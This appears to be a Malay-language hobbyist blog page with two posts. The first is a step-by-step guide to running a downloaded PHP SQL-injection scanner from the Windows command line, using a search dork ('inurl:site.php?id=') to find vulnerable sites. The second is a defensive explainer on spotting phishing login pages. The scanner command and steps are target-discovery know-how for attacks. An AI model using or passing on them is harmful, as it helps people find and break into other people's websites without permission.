Time kasih dah membaca.. :-) ingat, ilmu bukan wadud dan bukan korang yang punya.. :-) malah menjadi kewajipan untuk kita menyebarkan kepada orang ramai.. :-)
Share:

Sunday, October 3, 2010

Use CMD To Find vulnerability Sites - SQLi -

Sekadar berkongsi ilmu pengetahuan.. hehehehe.. semoga jangan salah guna, pastu jangan tunjuk wadud :-)..

Wadud buat sekadar untuk mengingati diri wadud dan kalau ada orang yang nak belajar, silakan bertanya.. :-) ilmu bukan wadud punya..


Street to da point..


Apa yang terpenting ada dalam com/lap korang untuk menjalankan CMD dengan menggunakan PerlScripts adalah :


1.) Download Perl. Pilih yang active Perl.

2.) Download Scripts SQLi Scanner ( version PHP ) - Thank 2 XshimeX -



OK.. first korang wajib install ActivePerl yang korang download tadi.


Kemudian, scripts yang korang download tadi dalam bentuk sqli.TXT kan? korang ubah / rename scripts tadi kepada sqli.php. Then.. letakkan di C:\.


Part ni korang kene usha baik2 ok..


1.) BUka CMD korang, dengan cara Start >> Search program and files >> CMD. Maka akan kuar macam screen shot kat bawah ni.




- Klik Untuk Membesar -



2.) Nampak kan C:\Users\Duad> ? okeh selepas tu pada CMD korang taip macam ni :

- C:\Users\Duad> C:\program files\php

- php.exe C:\sqli.php inurl:site.php?id=




- Klik Untuk Membesar -



3.) Kalau semua sukses, maka akan keluar macam ni :




- Klik Untuk Membesar -



Untuk yang berjaya wadud ucapkan tahniah, hehehe.. sebab wadud mula2 buat pown memang frust, sebab tak baca baek2.. dan untuk yang masih tak berjaya lagi, teruskan usaha.. pasti boleh.. :)


Ada masalah boleh jer tanya wadud, insyaallah wadud tolong.. :)
Share:

Tuesday, September 28, 2010

Bahaya Phishing

Apa itu Phishing?


Phishing adalah suatu bentuk penipuan dengan percobaan untuk mendapatkan informasi sensitif, seperti password dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah pesan komunikasi elektronik, seperti e-mail atau pesan instan.



Ungkapan “phishing” pertama kali digunakan sekitar tahun 1996 dimana pada saat itu hacker-hacker mulai mencuri account-account pengguna AOL (American On-Line) dengan cara mengirim e-mail kepada pengguna AOL, seolah-olah e-mail yang dikirim tersebut datang dari AOL.


Bahaya Phishing?


Serangan phishing sekarang menyerang pengguna online banking, payment services (layanan pembayaran online) seperti PayPal, website-website e-commerce, dan website-website e-mail. Phishing berkembang dengan cepat dalam hal jumlah dan pengalaman yang dimiliki penyerang. Faktanya bank-bank diluar sana seperti di Amerika Serikat, UK dan Australia sudah terkena serangan phishing.


Contoh dari Phishing?


Okey.. kat atas tu sebagai pendahuluan dari ape yang wadud nak tunjukkan kat korang, sekarang wadud akan cube buat sample phishing sebagai langkah berjaga2 kalau korang nanti terkena serangan tersebut.


Phishing adalah suatu serangan para Hacker untuk mendapatkan segala data2 untuk keperluan mereka, kira mencuri data kita tanpa kita sedari.. mereka mencuba untuk membuat se asli mungkin website untuk mengelabui mata orang ramai..


Jadi, berhati2.. wadud akan cuba untuk menerangkan pada korang langkah2 untuk menghindari dari terkena penipuan para2 Hacker..



Apakah langkah2 yang perlu kita lakukan?


1.) Tengok pada website yang akan kita log in, misalnya Mybank2u atau Paypal yang memungkin kan kita untuk memberi data2 kita, seperti username dan password. Sebagai contoh wadud sediakan gambar kat bawah ni.. tapi sebagai panduan je, korang jangan cuba2 lak, kalau didapati bersalah, hukuman menanti anda, hehehehe.. ( tapi ni wadud buat sebagai pelajaran, huhu.. )


Cuba korang masuk site bawah sini :




- klik untuk membesar -

- Contoh Gambar Website Asli -


Bandingkan dengan site ni :




- klik untuk membesar -

- Contoh Gambar Website Tiruan ( Phishing ) -


Ok bandingkan dengan site yang pertama dengan yang kedua dalam kotak merah yang dah wadud buat, sangat berbeza kan? tapi secara rambang page dia tetap seperti asli? betol x? kalau Hacker2 yang hebat, drang akan daftarkan site tiruan drang pada host2 yang berbayar maupun yang free, maka semua itu akan menjadi asli seperti yang asli nya sehingga kita sendiri langsung tak dapat cam, bahaya kan?


Tu la namanya Phishing, paling mudah untuk dipelajari.. misalnya korang dah salah masuk ke web yang di Phishing, secara tak sedar korang akan login masuk menggunakan username dan password korang? betol tak?


Dan secara automatik username dan password korang akan dapat pada Hacker yang membuat phishing tersebut.. dan lepas je drang dah dapat semua data korang, maka duit dan segala kepentingan korang dah berada di tangan drang..


Tambah2 duit dan sebagainya.. so berhati2 lah ye dalam ber internet.. :-) moga kita semua diselamatkan Allah dari segala kemungkinan yang berlaku... amin.. :-)
Share: